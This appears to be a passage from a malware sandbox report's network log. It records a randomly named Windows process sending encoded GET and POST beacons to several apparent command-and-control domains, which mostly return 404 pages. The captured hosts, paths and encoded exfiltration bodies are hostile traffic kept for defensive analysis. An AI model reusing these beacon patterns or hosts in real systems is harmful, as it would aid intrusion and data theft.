                                      Aug 26, 2024 18:28:10.009236097 CEST1236INData Raw: 2d 67 72 61 64 69 65 6e 74 2d 2d 79 65 6c 6c 6f 77 2d 74 6f 2d 67 72 65 65 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 44 31 45 34 44 44 20 31 30 30 25 29 3b 2d 2d 77 70
                                      Data Ascii: -gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg, #E4D1D1 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-red: linear-gradient(160deg, #EEEADD 0%, #


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.44974637.187.158.211805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:11.655240059 CEST490OUTGET /t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:12.564043045 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:12 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                      Aug 26, 2024 18:28:12.564074039 CEST224INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
                                      Aug 26, 2024 18:28:12.564085007 CEST1236INData Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
                                      Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
                                      Aug 26, 2024 18:28:12.564186096 CEST1236INData Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
                                      Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionSto
                                      Aug 26, 2024 18:28:12.564197063 CEST1236INData Raw: 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62
                                      Data Ascii: n(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script>
                                      Aug 26, 2024 18:28:12.564208984 CEST1236INData Raw: 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a
                                      Data Ascii: embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme
                                      Aug 26, 2024 18:28:12.564224005 CEST1236INData Raw: 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61
                                      Data Ascii: ing:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-st
                                      Aug 26, 2024 18:28:12.564372063 CEST1236INData Raw: 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f
                                      Data Ascii: 25em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style>2000<style id='global-styles-inline-css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio-
                                      Aug 26, 2024 18:28:12.564383984 CEST1236INData Raw: 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32
                                      Data Ascii: et--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp
                                      Aug 26, 2024 18:28:12.564394951 CEST1000INData Raw: 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                                      Data Ascii: rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,r
                                      Aug 26, 2024 18:28:12.569258928 CEST1236INData Raw: 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
                                      Data Ascii: font-size--small: 18px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 24px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--extra-small: 16px;--wp--preset--font-size--normal: 20px;--wp--preset--font-size--


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449747167.172.133.32805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:17.715655088 CEST754OUTPOST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 42 4f 69 49 4e 71 77 52 6f 4f 36 57 5a 34 73 70 6d 6d 59 31 48 46 35 71 68 46 37 58 6d 38 4c 67 67 3d 3d
                                      Data Ascii: 3L9l=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                                      Aug 26, 2024 18:28:18.223303080 CEST369INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:18 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449748167.172.133.32805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:20.258405924 CEST774OUTPOST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 68 4b 33 6d 4d 50 61 6c 42 43 37 67 66 44 6c 42 4f 4b 42 6a 44 53 53 50 4c 76 37 77 74 36 69 63 77 3d
                                      Data Ascii: 3L9l=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                                      Aug 26, 2024 18:28:20.732708931 CEST369INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:20 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.449749167.172.133.32805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:22.803288937 CEST10856OUTPOST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 31 50 32 6c 78 78 30 6b 52 51 46 44 47 51 41 38 57 2f 48 31 44 2f 57 65 6a 33 62 50 63 69 33 2b 68 70 47 6a 4c 4c 54 42 6c 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 55 67 6f 70 43 7a 33 58 50 35 32 43 4a 75 56 5a 44 4f 75 36 2f 67 56 7a 63 6b 61 55 69 56 51 54 6b 64 45 57 79 57 6e 33 66 47 47 66 7a 61 4a 38 46 55 34 47 6b 5a 66 48 6e 4c 48 6a 57 30 66 73 78 41 49 41 6f 37 49 38 44 32 4a 63 45 51 54 49 72 45 [TRUNCATED]
                                      Data Ascii: 3L9l=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k1P2lxx0kRQFDGQA8W/H1D/Wej3bPci3+hpGjLLTBlsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrUgopCz3XP52CJuVZDOu6/gVzckaUiVQTkdEWyWn3fGGfzaJ8FU4GkZfHnLHjW0fsxAIAo7I8D2JcEQTIrEMGk0YSJQKHzO5dmZAtQtbfpjbm5q0ZK5g5L/bKPqTnRlslKqaVDL9F88KFZjXJC6/FYIrBCVfupDVZ1E7bhIfv3tVIFOZ5OLS6N+Z/gmUJrZpU9XyzpB6gZDRXP5VzJGeCvk2zeZ8gDJ1fWsaGmZWFi5ChbAeWKBQBysa4SIcnnGEfZvqtwGcM1zDLyazyPHfKT0pgRb3/v9l2UfOZKqava84A1QTzgzcGz++jzcpjY/+aaaKdpqYZoXBiEBxGqtHaIcJ4cUYvYxV/cIZPEPKiJACb3m74lMVxsqs7jDypzbGMcZCHh4pgPsxVcYoFui6xDCq1iQSNvdrlOkfjdXlbtoApDvVzOdsyazUQE+/CRmDCA4pKZKQxGhsIt5UgmK2PRJCTV5k8nYK7DK+5INE83MSX0GbUBlSncb4/KHtmLBjhp1VCIKJjEGoTkCvH393+sGhBsLgNHtHRjLfN0gAznFQ1xyhIGnilF5SNvHhxYgHV9hxHFQGHWUSzJEtNallVog1lmmY8+u1FlSGDZzhFGzKUPs77R0vDy7oVWO515n8MNvjZd+jfF8n5iVgh2SRXSE1c+KgvewiLExItw05G341HdaudUmMPzM2eTebyWxYhxqE3wQYiayjC4rpVPGIaahnxugldpqRZJZkvUVwT/kri9aqi/WEP [TRUNCATED]
                                      Aug 26, 2024 18:28:23.238405943 CEST369INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:23 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.449750167.172.133.32805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:25.344281912 CEST485OUTGET /zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:25.802659988 CEST705INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 555
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.449751206.119.82.116805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:31.092681885 CEST736OUTPOST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
